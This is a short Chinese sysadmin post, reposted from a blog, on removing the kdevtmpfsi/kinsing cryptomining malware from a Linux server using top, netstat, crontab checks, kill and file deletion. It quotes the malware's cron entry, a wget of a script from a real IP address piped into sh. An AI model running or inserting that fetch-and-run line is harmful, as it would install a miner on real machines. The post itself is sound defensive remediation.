【服务器】挖矿病毒 kdevtmpfsi（一针见效）

附：尝试了许多普通kill 和 rm 操作，发现根本无法解决问题。分析原因在于定时任务为删除掉。
状态：CPU爆满，导致线上服务宕机。
图片是盗的，进程占用是真实的。

1、# top
查看cpu占用情况，找到占用cpu的进程 最后是 kdevtmpfsi

2、# netstat -natp
根据上面的进程名查看与内网的 tcp 链接异常 ，看到陌生ip，查出为国外ip,估计主机被人种后门了

此时，挖矿脚本大概率定时在你的crontab里面。

crontab -l ，发现异常定时任务，* * * * * wget -q -O -http://195.3.146.118/unk.sh | sh > /dev/null 2>&1

解决办法：

top命令找到kdevtmpfsi和kinsing的进程号A和B
systemctl status 进程A

rm -fr /var/tmp/kinsing 和 rm -fr /tmp/kdevtmpfsi
kill -9 进程A 和 kill -9 进程B
cd /var/spool/cron 查看是否有相关的木马定时任务在执行（root文件里面为定时任务）有的话删掉再重启下crontab（命令：systemctl restart crond.service）
后续操作：（找到文件，全部删除，若没有则无需操作）
find / -name kdevtmpfsi
find / -name kinsing

转载:https://blog.csdn.net/oYuZhongManBu1234/article/details/104281503